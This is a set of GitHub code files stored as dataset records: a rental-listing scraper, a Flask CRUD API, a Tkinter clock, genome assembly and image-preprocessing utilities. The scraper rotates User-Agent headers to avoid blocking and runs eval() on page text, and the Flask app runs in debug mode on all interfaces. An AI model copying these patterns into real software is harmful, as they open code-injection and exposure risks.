i.endswith(\"_rig2world.txt\")][0]\n        self.rig2worlds, self.timestamps = self.load_rig2world(path)\n        path = [os.path.join(base,i) for i in os.listdir(base) if i.endswith(\"_extrinsics.txt\")][0]\n        self.rig2cam = self.load_extrinsics(path)\n\n    def load_extrinsics(self,path:str)->np.ndarray:\n        return np.loadtxt(path,delimiter=\",\").reshape([4,4]).astype(np.float32)\n    def load_rig2world(self, path:str)->np.ndarray:\n        timestamps = []\n        rig2worlds = []\n        with open(path) as f:\n            for line in f:\n                items = line.strip().split(',')\n                timestamps.append(\n                    np.uint64(items[0])\n                )\n                rig2worlds.append(\n                    np.array(items[1:]).astype(np.float32).reshape([4,4])\n                )\n        return np.stack(rig2worlds, 0).astype(np.float32),\\\n            np.array(timestamps, dtype=np.uint64)\n    def __len__(self):\n        return len(self.timestamps)\n    def __getitem__(self, index:int)->RigFrame:\n        return RigFrame(\n            rig2cam = 
self.rig2cam,\n            rig2world = self.rig2worlds[index],\n            timestamp = self.timestamps[index]\n        )\n    def timestamp(self, t:np.uint64):\n        index = np.argmin(abs(self.timestamps - t))\n        return self.__getitem__(index)\n\n\nif __name__ == '__main__':\n    print(RGBDataset(\".\")[10])\n    print(DepthDataset(\".\")[10])\n    print(HumanDataset(\".\")[10])\n    print(RigDataset(\".\")[100])","repo_name":"walkerchi/ethz-mixed-reality-project","sub_path":"io/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18496772262","text":"\n# Description: crawl rental listings from the Lianjia site\nimport os\nimport random\nimport re\nimport time\nfrom collections import OrderedDict\nfrom datetime import datetime\n\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom craw_lianjia.init_db import connection_to_mysql\nfrom craw_tools.get_ua import get_ua\n\n\nclass LianJiaHouse:\n    def __init__(self, city, url, page_size, save_file_path):\n        \"\"\"\n        Initialize\n        @param url: main start page\n        @param page_size: number of rental listings per page\n        \"\"\"\n        # city\n        self.city = city\n        # main start page\n        self.base_url = url\n        # page under the current filter conditions\n        self.current_url = url\n        # administrative districts\n        self.area = []\n        # rental type: whole rental + shared rental\n        self.rental_method = ['rt200600000001', 'rt200600000002']\n        # layout: one-, two-, three-, four-plus-bedroom\n        self.rooms_number = ['l0', 'l1', 'l2', 'l3']\n        # room size: <=40 sqm, 40-60, 60-80, 80-100, 100-120, >120\n        # self.room_size = ['ra0', 'ra1', 'ra2', 'ra3', 'ra4', 'ra5']\n        # start page index defaults to 0\n        self.start_page = 0\n        # total number of data pages under the current conditions\n        self.pages = 0\n        # listings per page, default page_size=30\n        self.page_size = page_size\n        # maximum number of pages\n        self.max_pages = 100\n        # cap on the amount of data, used for testing\n        self.count = 0\n        # local file save path\n        self.save_file_path = save_file_path\n        # ids of all listings saved so far, used for deduplication\n        self.house_id = self.get_exists_house_id()\n        # collected data\n        self.data_info = []\n        # wait times: maximum + minimum (in seconds)\n        self.await_max_time = 8\n        self.await_min_time = 2\n        # number of retries\n        self.retry = 5\n        # crawling takes a while, so the database connection is made when saving the data, not here\n        self.pymysql_engine, self.pymysql_session = None, None\n        # crawler headers; configure several to avoid getting blocked\n        self.headers = {\n            'User-Agent': get_ua(),\n        }\n\n    def get_main_page(self):\n        \"\"\"\n        Enter the main start page\n        @return:\n        \"\"\"\n        # get the total record count under the current filter\n        soup, count_main = self.get_house_count()\n\n        # if the count exceeds the maximum queryable amount, add the first filter condition\n        if int(count_main) > self.page_size*self.max_pages:\n            # take all administrative districts of the city as the first filter condition\n            soup_uls = soup.find_all('li', class_='filter__item--level2', attrs={'data-type': 'district'})\n            self.area = self.get_area_list(soup_uls)\n\n            # iterate over the districts and regenerate the filter\n            for area in self.area:\n                self.get_area_page(area)\n        else:\n            # fetch the data directly\n            self.get_pages(int(count_main), '', '', '')\n\n        # save the data to the database\n        self.data_to_sql()\n\n    def get_area_page(self, area):\n        \"\"\"\n        Current filter: district\n        @param area:\n        @return:\n        \"\"\"\n        # rebuild the url for the district\n        self.current_url = self.base_url + area + '/'\n        # get the total record count under the current filter\n        soup, count_area = self.get_house_count()\n\n        '''if the count still exceeds the maximum queryable amount, add the second filter condition'''\n        if int(count_area) > self.page_size * self.max_pages:\n            # iterate over the rental types and regenerate the filter\n            for rental_method in self.rental_method:\n                self.get_area_and_rental_page(area, rental_method)\n        else:\n            print('Current filter: {0}, {1} records in total, fetching page {2}'.format(area, count_area, self.pages))\n            self.get_pages(int(count_area), area, '', '')\n\n    def get_area_and_rental_page(self, area, rental_method):\n        \"\"\"\n        Current filter: district + rental type\n        @param area: district\n        @param rental_method: rental type\n        @return:\n        \"\"\"\n        # rebuild the url for district + rental type\n        self.current_url = self.base_url + area + '/' + rental_method + '/'\n        # get the total record count under the current filter\n        soup, 
count_area_rental = self.get_house_count()\n\n        '''if the count still exceeds the maximum queryable amount, add the third filter condition'''\n        if int(count_area_rental) > self.page_size * self.max_pages:\n            # iterate over the layouts and regenerate the filter\n            for room_number in self.rooms_number:\n                self.get_area_and_rental_and_room_page(area, rental_method, room_number)\n        else:\n            print('Current filter: {0} {1}, {2} records in total, fetching page {3}'.format(\n                area, rental_method, count_area_rental, self.pages))\n            self.get_pages(int(count_area_rental), area, rental_method, '')\n\n    def get_area_and_rental_and_room_page(self, area, rental_method, room_number):\n        \"\"\"\n        Current filter: district + rental type + number of bedrooms\n        @param area: district\n        @param rental_method: rental type\n        @param room_number: number of bedrooms\n        @return:\n        \"\"\"\n        # rebuild the url for district + rental type + bedrooms\n        self.current_url = self.base_url + area + '/' + rental_method + room_number + '/'\n        # get the total record count under the current filter\n        soup, count_area_rental_room = self.get_house_count()\n\n        '''if the count exceeds the maximum even under the final filter, only the first pages can be crawled'''\n        if int(count_area_rental_room) > self.page_size * self.max_pages:\n            print('================== cannot fetch all data: the current filter exceeds the queryable total; crawling the first 100 pages')\n            # send_email()\n            print('Current filter: {0} {1} {2}, {3} records in total, fetching page {4}'.format(\n                area, rental_method, room_number, count_area_rental_room, self.pages))\n            self.get_pages(int(self.page_size * self.max_pages), area, rental_method, room_number)\n\n        else:\n            print('Current filter: {0} {1} {2}, {3} records in total, fetching page {4}'.format(\n                area, rental_method, room_number, count_area_rental_room, self.pages))\n            self.get_pages(int(count_area_rental_room), area, rental_method, room_number)\n\n    def get_pages(self, count_number, area, rental_method, room_number):\n        \"\"\"\n        Determine the pagination from the total record count\n        @param count_number: total record count\n        @param area: district\n        @param rental_method: rental type\n        @param room_number: number of bedrooms\n        @return:\n        \"\"\"\n        # number of pages\n        self.pages = int(count_number/self.page_size) \\\n            if (count_number%self.page_size) == 0 else int(count_number/self.page_size)+1\n\n        '''iterate over every page'''\n        for page_index in range(1, self.pages+1):\n            self.current_url = self.base_url + area + '/' + 'pg' + str(page_index) + rental_method + room_number + '/'\n\n            # parse the listings on the current page and collect each listing's detail link\n            self.get_per_house()\n            page_index += 1\n\n    def get_per_house(self):\n        \"\"\"\n        Parse the detail link of every listing on the page\n        @return:\n        \"\"\"\n        print(self.current_url)\n        # fetch the current page\n        response = requests.get(url=self.current_url, headers=self.headers)\n        soup = BeautifulSoup(response.text, 'html.parser')\n\n        # locate each listing's div\n        soup_div_list = soup.find_all(class_='content__list--item--main')\n        # iterate over the divs to get each listing's detail link and address\n        for soup_div in soup_div_list:\n            # locate and read the listing's detail link\n            # detail_info = soup_div.find_all('p', class_='content__list--item--title twoline')[0].a.get('href')\n            detail_info = soup_div.find_all('p', class_='content__list--item--title')[0].a.get('href')\n            detail_href = 'https://nj.lianjia.com' + detail_info\n\n            # use the number in the detail link as the unique listing id\n            house_id = detail_info.split('/')[2].replace('.html', '')\n            '''parse part of the data'''\n            # read the address and the other details from this page\n            detail_text = soup_div.find_all('p', class_='content__list--item--des')[0].get_text()\n            info_list = detail_text.replace('\\n', '').replace(' ', '').split('/')\n            # read the rent\n            price_text = soup_div.find_all('span', class_='content__list--item-price')[0].get_text()\n\n            # an empty address means a serviced apartment, whose detail page cannot be parsed, so drop it\n            if len(info_list) == 5:\n                # if this listing has already been crawled\n                if self.check_exist(house_id):\n                    print('Listing id {0} already saved, not crawling it again!'.format(house_id))\n                else:\n                    # parse the listing's detailed data\n                    self.get_house_content(detail_href, house_id, info_list, price_text)\n\n        return \"\"\n\n    def get_house_content(self, href, house_id, info_list, price_text):\n        \"\"\"\n        
Fetch the content of the listing detail page\n        @param href: detail page link\n        @param house_id: listing id passed from the previous page\n        @param info_list: partial data passed from the previous page\n        @param price_text: rent passed from the previous page\n        @return:\n        \"\"\"\n        # every 1000 records, let the user decide whether to continue\n        if int(self.count/1000) > 0:\n            input_text = input(\"================> Quit? Enter Q/q to exit now: \")\n\n            if input_text == \"Q\" or input_text == \"q\":\n                # save the data to the database\n                self.data_to_sql()\n                print(\"================== data saved to the database, program exited! ==================\")\n                exit(0)\n            else:\n                print(\"==================> continuing to crawl...\")\n                self.count = 0\n\n        # ordered dict holding the listing result\n        house_info = OrderedDict()\n        for i in range(0, self.retry):\n            # sleep for a random 2-8 seconds\n            time.sleep(random.randint(self.await_min_time, self.await_max_time))\n            '''fetch the page to get the detailed data'''\n            response = requests.get(url=href, headers=self.headers, timeout=10)\n            soup = BeautifulSoup(response.text, 'html.parser')\n\n            '''data passed in from the previous page'''\n            house_info['house_address'] = info_list[0]\n            house_info['house_rental_area'] = info_list[1]\n            house_info['house_orientation'] = info_list[2]\n            house_info['house_layout'] = info_list[3]\n            house_info['house_floor'] = info_list[4]\n            house_info['house_rental_price'] = price_text\n\n            '''parse the listing update time'''\n            soup_div_text = soup.find_all('div', class_='content__subtitle')[0].get_text()\n            house_info['house_id'] = house_id  # the listing id comes straight from the previous page\n            # house_info['house_id'] = re.findall(r'[A-Z]*\\d{5,}', soup_div_text)[0]\n            house_info['house_update_time'] = re.findall(r'\\d{4}-\\d{2}-\\d{2}', soup_div_text)[0]\n\n            '''parse the coordinates'''\n            # grab the script-defined block that holds the coordinates\n            location_str = response.text[re.search(r'(g_conf.coord)+', response.text).span()[0]:\n                                         re.search(r'(g_conf.subway)+', response.text).span()[0]]\n            # clean the string and quote the keys so it can be turned into a dict\n            location_str = location_str.replace('\\n', '').replace(' ', '').replace(\"longitude\", \"'longitude'\"). \\\n                replace(\"latitude\", \"'latitude'\")\n            # convert the full coordinate data into a dict and store it\n            location_dict = eval(location_str[location_str.index('{'): location_str.index('}') + 1])\n            house_info['house_longitude'] = location_dict['longitude']\n            house_info['house_latitude'] = location_dict['latitude']\n\n            '''parse the rental type (whole/shared/any); the stripped token is the site's label text'''\n            house_info['house_rental_method'] = soup.find_all('ul', class_='content__aside__list')[0].find_all('li')[0]. \\\n                get_text().replace('租赁方式:', '')\n\n            '''parse the listing tags'''\n            house_info['house_tag'] = soup.find_all('p', class_='content__aside--tags')[0]. \\\n                get_text().replace('\\n', '/').replace(' ', '')\n\n            '''other basic info'''\n            # locate the div and get all basic-info li tags\n            soup_li = soup.find_all('div', class_='content__article__info', attrs={'id': 'info'})[0]. 
\\\n                find_all('ul')[0].find_all('li', class_='fl oneline')\n            # assign the fields (the stripped tokens are the site's Chinese label texts)\n            house_info['house_elevator'] = soup_li[8].get_text().replace('电梯:', '')\n            house_info['house_parking'] = soup_li[10].get_text().replace('车位:', '')\n            house_info['house_water'] = soup_li[11].get_text().replace('用水:', '')\n            house_info['house_electricity'] = soup_li[13].get_text().replace('用电:', '')\n            house_info['house_gas'] = soup_li[14].get_text().replace('燃气:', '')\n            house_info['house_heating'] = soup_li[16].get_text().replace('采暖:', '')\n            house_info['create_time'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n            house_info['city'] = self.city\n\n            print(house_info['house_address'])\n            # store this listing's info\n            self.data_info.append(house_info)\n            self.count += 1\n\n            '''once more than 50 records accumulate, flush them to disk'''\n            if len(self.data_info) >= 50:\n                self.data_to_csv()\n            # no exception raised: break out of the retry loop; otherwise retry\n            break\n\n    def check_exist(self, house_id):\n        \"\"\"\n        Check whether this listing has already been collected\n        @param house_id:\n        @return:\n        \"\"\"\n        # check whether the listing id already exists in the collected data\n        if house_id in self.house_id:\n            return True\n        else:\n            self.house_id.append(house_id)\n            return False\n\n    def get_exists_house_id(self):\n        \"\"\"\n        Collect the listing ids from the data crawled previously\n        @return:\n        \"\"\"\n        if os.path.exists(self.save_file_path):\n            df_data = pd.read_csv(self.save_file_path, encoding='utf-8', )\n            return df_data['house_id'].to_list()\n        else:\n            return []\n\n    def data_to_sql(self):\n        \"\"\"\n        Save/append the data to the database\n        @return:\n        \"\"\"\n        # connect to the database\n        self.pymysql_engine, self.pymysql_session = connection_to_mysql()\n        # read the data and write it to the database\n        df_data = pd.read_csv(self.save_file_path, encoding='utf-8')\n        # import the data into mysql\n        df_data.to_sql('t_lianjia_rent_info', self.pymysql_engine, index=False, if_exists='append')\n\n    def data_to_csv(self):\n        \"\"\"\n        Save/append the data locally\n        @return:\n        \"\"\"\n        # collect the data into a DataFrame\n        df_data = pd.DataFrame(self.data_info)\n\n        if os.path.exists(self.save_file_path) and os.path.getsize(self.save_file_path):\n            # append to the file\n            df_data.to_csv(self.save_file_path, mode='a', encoding='utf-8', header=False, index=False)\n        else:\n            # write the file with a header\n            df_data.to_csv(self.save_file_path, mode='a', encoding='utf-8', index=False)\n\n        # clear the in-memory batch\n        self.data_info = []\n\n    def get_house_count(self):\n        \"\"\"\n        Get the listing count under the current filter\n        @return:\n        \"\"\"\n        # fetch the start page for the current area\n        response = requests.get(url=self.current_url, headers=self.headers)\n        # parse the page with BeautifulSoup\n        soup = BeautifulSoup(response.text, 'html.parser')\n        # total record count\n        count = soup.find_all(class_='content__title--hl')[0].string\n\n        return soup, count\n\n    def get_area_list(self, soup_uls):\n        \"\"\"\n        Get and store all administrative districts of the city\n        @param soup_uls:\n        @return:\n        \"\"\"\n        area_list = []\n        for soup_ul in soup_uls:\n            # read the district from the href of the a tag in each ul\n            href = soup_ul.a.get('href')\n            # skip the first entry\n            if href.endswith('/zufang/'):\n                continue\n            else:\n                # store the district in the list\n                area_list.append(href.replace('/zufang/', '').replace('/', ''))\n\n        return area_list\n\n\nif __name__ == '__main__':\n    city_number = 'nj'\n    city_name = '南京'\n    url = 'https://{0}.lianjia.com/zufang/'.format(city_number)\n    page_size = 30\n    save_file_path = r'D:\\project\\craw_lianjia\\data\\data_house.csv'\n    lianjia_house = LianJiaHouse(city_name, url, page_size, save_file_path)\n    lianjia_house.get_main_page()","repo_name":"chenyibelive/craw_lianjia","sub_path":"craw_lianjia/craw_lianjia_house.py","file_name":"craw_lianjia_house.py","file_ext":"py","file_size_in_byte":17778,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"43495937567","text":"# -*- coding: utf-8 -*-\nimport logging\nimport 
urllib.parse\n\nimport httpx\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\n\nclass ReplayPost:\n    def __init__(self, df: pd.DataFrame):\n        self.df = df\n\n    def process_response(self):\n        \"\"\"\n        Post-process some response info\n        @return:\n        \"\"\"\n        self.df['http_code'] = self.df['response_obj'].map(\n            lambda x: x.status_code if isinstance(x, httpx.Response) and x else \"null\")\n        self.df['elapsed_time'] = self.df['response_obj'].map(\n            lambda x: x.elapsed.total_seconds() if isinstance(x, httpx.Response) and x else 0)\n        self.df['response'] = self.df['response_obj'].map(\n            lambda x: x.text if isinstance(x, httpx.Response) and x else x)\n\n        self.df['get_params'] = self.df['get_params'].map(urllib.parse.urlencode)\n        self.df.drop(columns=['response_obj'], inplace=True)\n        logger.info(f'{self.df.shape[0]} requests sent in total')\n","repo_name":"factoid233/python_goreplay","sub_path":"src/replay/replay_post.py","file_name":"replay_post.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"40595453071","text":"def match(s1,s2):\n    index=-1\n    for i in range(min(len(s1),len(s2))//2,min(len(s1),len(s2))):\n        if s1[len(s1)-i:]==s2[:i]:\n            index=i\n    return index\n\ndef long(strings):\n    def compare():\n        pairs=[]\n        for i in range(len(strings)):\n            for j in range(len(strings)):\n                if i!=j:\n                    _,s1=strings[i]\n                    _,s2=strings[j]\n                    m=match(s1,s2)\n                    if m>0:\n                        pairs.append((i,j,m,s1,s2))\n        return pairs\n    def split(pairs):\n        froms=[]\n        tos=[]\n        for (a,b,_,_,_) in pairs:\n            froms.append(a)\n            tos.append(b)\n        return (froms,tos)\n    def get_unmatched(froms,tos):\n        for i in range(len(froms)):\n            matched=False\n            for j in range(len(tos)):\n                if tos[j]==froms[i]:\n                    matched=True\n                    break\n            if not matched:\n                return i\n\n    pairs=compare()\n    genome=[]\n    while len(pairs)>0:\n        (froms,tos)=split(pairs)\n        index=get_unmatched(froms,tos)\n        pair=pairs[index]\n        _,_,length,pre,post=pair\n        del pairs[index]\n        if len(genome)==0:\n            genome.append(pre)\n        genome.append(post[length:])\n    return ''.join(genome)\n\nif __name__=='__main__':\n    def combine(seq_record):\n        return (seq_record.id,str(seq_record.seq))\n\n    from Bio import SeqIO\n    print (long([combine(seq_record) for seq_record in SeqIO.parse(\"c:/Users/Weka/Downloads/rosalind_long.txt\", \"fasta\")]))\n","repo_name":"weka511/bioinformatics","sub_path":"LONG.py","file_name":"LONG.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"54"} +{"seq_id":"5796208957","text":"from tkinter import *\nfrom tkinter import messagebox as m\nimport random\nimport time\n\nroot=Tk()\nroot.geometry(\"1030x2100\")\nroot.config(bg=\"black\")\n\ncolor=[\n\t\"red\",\n\t\"orange\",\n\t\"blue\",\n\t\"magenta\",\n\t\"red\",\n\t\"yellow\",\n\t\"cyan\",\n\t\"blue\",\n\t\"green\",\n\t\"white\",\n]\n#===================================\ndef exit():\n\tvar=m.askquestion(\"EXIT\",\"Do You Want To Exit .\")\n\tif var ==\"yes\":\n\t\troot.destroy()\n\t\t\n#===================================\t\ndef change ():\n\ttop=Toplevel ()\n\ttop.geometry(\"1030x2100\")\n\tfor i in range (1,1000):\n\t\trc=random.choice(color)\n\t\ttop.config(bg=rc)\n\t\ttop.update_idletasks()\n\ttop.mainloop()\n\t\n#===================================\ndef start 
():\n\t\n\t\n\tr=random.choice(color)\n\tlbl.config(fg=r)\n\troot.update_idletasks()\n\troot.config(bg=\"black\")\n\tTime=time.strftime(\"%H:%M:%S\")\n\tlbl.config(text=Time)\n\tlbl.after(100,start)\n\t\n\n\n#Label\t\n#===================================\nname=Label(\n\troot,\n\ttext=\"developed by: SIDHARTH \",\n\tfont=(\"times new roman \",5 ,\"bold\",\"italic\"),\n\tbg=\"black\",\n\tfg=\"orange\"\n)\nname.pack( anchor=E)\nlbl=Label(\n\troot,\n\tfont=(\"times New roman\",25),\n\tbg=\"black\",\n\tfg=\"white\",\n)\n\nlbl.pack(pady=800)\n\n\t\n\n\n#start button\n#===================================\nbt=Button(\n\troot,\n\ttext=\"START\",\n\tbg=\"cyan\",\n\tfg=\"black\",\n\tactivebackground=\"cyan\",\n\tactiveforeground=\"black\",\n\trelief=FLAT,\n\tbd=10,\n\tcommand=start,\n\tpadx=100\n\t\n)\nbt.pack(anchor=S)\n\n#exit button\n#===================================\nbt=Button(\n\troot,\n\ttext=\"EXIT\",\n\tbg=\"cyan\",\n\tfg=\"black\",\n\tactivebackground=\"cyan\",\n\tactiveforeground=\"black\",\n\trelief=FLAT,\n\tbd=10,\n\tcommand=exit,\n\tpadx=133\n\t\n)\nbt.pack(side=RIGHT)\n\t\n#color change button\n#===================================\t\nbtn=Button (\n\troot,\n\ttext=\"Change Color\",\n\tbg=\"cyan\",\n\tfg=\"black\",\n\tactivebackground=\"cyan\",\n\tactiveforeground=\"black\",\n\trelief=FLAT,\n\tbd=10,\n\tcommand=change,\n)\nbtn.pack(side=\"left\",padx=0)\t\n\nroot.mainloop()","repo_name":"sid-hack3r/Tk_Color_Clock","sub_path":"color_clock.py","file_name":"color_clock.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35192512879","text":"import json\n\nfrom flask import jsonify, request\nfrom sqlalchemy.sql.elements import and_\n\nfrom config import app, db\nfrom creat_db import init_db\nfrom models import Users, Order, Offer\n\n@app.route('/users/', methods=['GET', 'POST'])\ndef get_users():\n    if request.method == 'POST':\n        data = request.json\n        all_users = db.session.query(Users).all()\n        all_users_id = []\n        for user_ in all_users:\n            all_users_id.append(user_.id)\n        if data.get('id') not in all_users_id:\n            new_user = Users(id=data.get('id'),\n                             first_name=data.get('first_name'),\n                             last_name=data.get('last_name'),\n                             age=data.get('age'),\n                             email=data.get('email'),\n                             role=data.get('role'),\n                             phone=data.get('phone'))\n            db.session.add(new_user)\n            db.session.commit()\n            db.session.close()\n            return f\"User {data.get('id')} created\"\n        else:\n            return f\"User with id {data.get('id')} already exists\"\n    elif request.method == 'GET':\n        all_users = db.session.query(Users).all()\n        all_users_list = []\n        for user_ in all_users:\n            temp_dict = {}\n            temp_dict['id'] = user_.id\n            temp_dict['age'] = user_.age\n            temp_dict['first_name'] = user_.first_name\n            temp_dict['last_name'] = user_.last_name\n            temp_dict['email'] = user_.email\n            temp_dict['phone'] = user_.phone\n            all_users_list.append(temp_dict)\n        return jsonify(all_users_list)\n\n@app.route('/users/<int:uid>/', methods=['GET', 'PUT', 'DELETE'])\ndef users_id(uid):\n    \"\"\"Single user: 
retrieve, update, and delete.\"\"\"\n    all_users = db.session.query(Users).filter(Users.id == uid).first()\n    if all_users:\n        if request.method == 'GET':\n            temp_dict = {}\n            temp_dict['id'] = all_users.id\n            temp_dict['age'] = all_users.age\n            temp_dict['first_name'] = all_users.first_name\n            temp_dict['last_name'] = all_users.last_name\n            temp_dict['email'] = all_users.email\n            temp_dict['phone'] = all_users.phone\n            return jsonify(temp_dict)\n\n        elif request.method == 'DELETE':\n            item_del = Users.query.get(uid)\n            db.session.delete(item_del)\n            db.session.commit()\n            db.session.close()\n            return f'Item - {uid} removed from DB'\n        elif request.method == 'PUT':\n            item_put = Users.query.get(uid)\n            new_data = request.json\n\n            item_put.first_name = new_data.get('first_name')\n            item_put.last_name = new_data.get('last_name')\n            item_put.age = new_data.get('age')\n            item_put.email = new_data.get('email')\n            item_put.role = new_data.get('role')\n            item_put.phone = new_data.get('phone')\n\n            db.session.add(item_put)\n            db.session.commit()\n            db.session.close()\n            return f'Item {uid} changed'\n\n        return 'Unknown type request'\n    return 'Not found'\n\n@app.route('/orders/', methods=['GET', 'POST'])\ndef orders():\n    all_orders = db.session.query(Order).all()\n    all_orders_list = []\n    for order_ in all_orders:\n        temp_dict = {}\n        temp_dict['id'] = order_.id\n        temp_dict['name'] = order_.name\n        temp_dict['address'] = order_.address\n        temp_dict['price'] = order_.price\n        temp_dict['customer_name'] = ''\n        temp_dict['executor_name'] = ''\n        if order_.customer:\n            temp_dict['customer_name'] = order_.customer.first_name\n        if order_.executor:\n            temp_dict['executor_name'] = order_.executor.first_name\n        all_orders_list.append(temp_dict)\n    return jsonify(all_orders_list)\n\n\n@app.route('/orders/<int:uid>/', methods=['GET', 'PUT', 'DELETE'])\ndef orders_id(uid):\n    all_orders = db.session.query(Order).filter(Order.id == uid).first()\n    if all_orders:\n        if request.method == 'GET':\n            temp_table = {}\n            temp_table['Order_id'] = all_orders.id\n            temp_table['Order_name'] = all_orders.name\n            temp_table['Customer_name'] = ''\n            temp_table['executor_name'] = ''\n            if all_orders.customer:\n                temp_table['Customer_name'] = all_orders.customer.first_name\n            if all_orders.executor:\n                temp_table['executor_name'] = all_orders.executor.first_name\n            return jsonify(temp_table)\n\n\n@app.route('/offers/', methods=['GET', 'POST'])\ndef offers():\n    if request.method == 'POST':\n        data = request.json\n        all_offers = db.session.query(Offer).all()\n        all_offers_id = []\n        for order_ in all_offers:\n            all_offers_id.append(order_.id)\n        if data.get('id') not in all_offers_id:\n\n            new_offer = Offer(id=data.get('id'),\n                              order_id=data.get('order_id'),\n                              executor_id=data.get('executor_id'))\n            db.session.add(new_offer)\n            db.session.commit()\n            db.session.close()\n            return f\"Offer {data.get('id')} created\"\n        else:\n            return f\"Offer with id {data.get('id')} already exists\"\n    elif request.method == 'GET':\n        all_offers = db.session.query(Offer.id, Offer.order_id, Offer.executor_id,\n                                      Order.name).\\\n            join(Order, and_(Offer.order_id == Order.id)).all()\n        all_offers_list = []\n        for offer_ in all_offers:\n            temp_dict = {}\n            temp_dict['id'] = offer_.id\n            temp_dict['order_id'] = offer_.order_id\n            temp_dict['executor_id'] = offer_.executor_id\n            temp_dict['name'] = offer_.name\n            all_offers_list.append(temp_dict)\n        return jsonify(all_offers_list)\n    return 'Unknown type request'\n\n\n@app.route('/offers/<int:uid>', methods=['GET', 'PUT', 
'DELETE'])\ndef offers_id(uid):\n    all_offers = db.session.query(Offer).filter(Offer.id == uid).first()\n    if all_offers:\n        if request.method == 'GET':\n            offer_ = Offer.query.get(uid)\n            temp_dict = {}\n            temp_dict['id'] = offer_.id\n            temp_dict['order_id'] = offer_.order_id\n            if all_offers.user:\n                temp_dict['executor_name'] = all_offers.user.first_name\n            temp_dict['executor_id'] = offer_.executor_id\n            return jsonify(temp_dict)\n        elif request.method == 'DELETE':\n            offer_ = Offer.query.get(uid)\n            db.session.delete(offer_)\n            db.session.commit()\n            db.session.close()\n            return f'Item {uid} removed from DB'\n        elif request.method == 'PUT':\n            item_put = Offer.query.get(uid)\n            new_data = request.json\n\n            item_put.id = new_data.get('id')\n            item_put.order_id = new_data.get('order_id')\n            item_put.executor_id = new_data.get('executor_id')\n\n            db.session.add(item_put)\n            db.session.commit()\n            db.session.close()\n            return f'Item {uid} changed'\n    return 'Not found'\n\nif __name__ == '__main__':\n    init_db()\n    app.run(host='0.0.0.0', port=8080, debug=True)","repo_name":"dos1985/lesson16_HW","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19754973971","text":"import os\r\nimport shutil\r\n\r\ncaminho_original = 'Office\\Desktop\\media_total\\media2'\r\ncaminho_novo = 'Office\\Desktop\\media_total\\medias'\r\n\r\ntry:\r\n    os.mkdir(caminho_novo)\r\nexcept FileExistsError as e:\r\n    print(f'Folder {caminho_novo} already exists!')\r\n\r\nfor root, dirs, files in os.walk(caminho_original):\r\n    for file in files:\r\n        old_file_path = os.path.join(root, file)\r\n        new_file_path = os.path.join(caminho_novo, file)\r\n\r\n        if 'txt' in file:\r\n            shutil.copy(old_file_path, new_file_path)\r\n            print(f'File {file} copied successfully!')\r\n\r\n\r\n","repo_name":"renatamoon/python_classes_poo","sub_path":"python_134_MoverCopiarApagar.py","file_name":"python_134_MoverCopiarApagar.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37186295147","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov  1 17:14:27 2018\n\n@author: Josefine\n\"\"\"\n\nimport numpy as np\nimport re\nimport nibabel as nib\nimport glob\nfrom skimage.transform import resize\n\ndef natural_sort(l): \n    convert = lambda text: int(text) if text.isdigit() else text.lower() \n    alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n    return sorted(l, key = alphanum_key)\n\n# Create original high res data function:\ndef create_data(filename_img):\n    a = nib.load(filename_img)\n    a = a.get_data()\n    a2 = np.clip(a,-1000,1000)\n    a3 = np.interp(a2, (a2.min(), a2.max()), (-1, +1))\n    # Reshape:\n    img = np.zeros([512,512,512])+np.min(a3)\n    index1 = int(np.ceil((512-a.shape[2])/2))\n    index2 = int(512-np.floor((512-a.shape[2])/2))\n    img[:,:,index1:index2] = a3\n    images = img.transpose((2,0,1))\n    return images\n\ndef create_label(filename_label):\n    # Label creation\n    b = nib.load(filename_label)\n    b = b.get_data()\n    img = np.zeros([b.shape[0],b.shape[0],b.shape[0]])\n    index1 = int(np.ceil((img.shape[2]-b.shape[2])/2))\n    index2 = int(img.shape[2]-np.floor((img.shape[2]-b.shape[2])/2))\n    img[:,:,index1:index2] = b\n    labels = img.transpose((2,0,1))\n    return labels\n\n# Fusion of low resolution probability maps\ndef fusion(prob_maps_axial, prob_maps_sag, prob_maps_cor):\n    # Reshape sagittal 
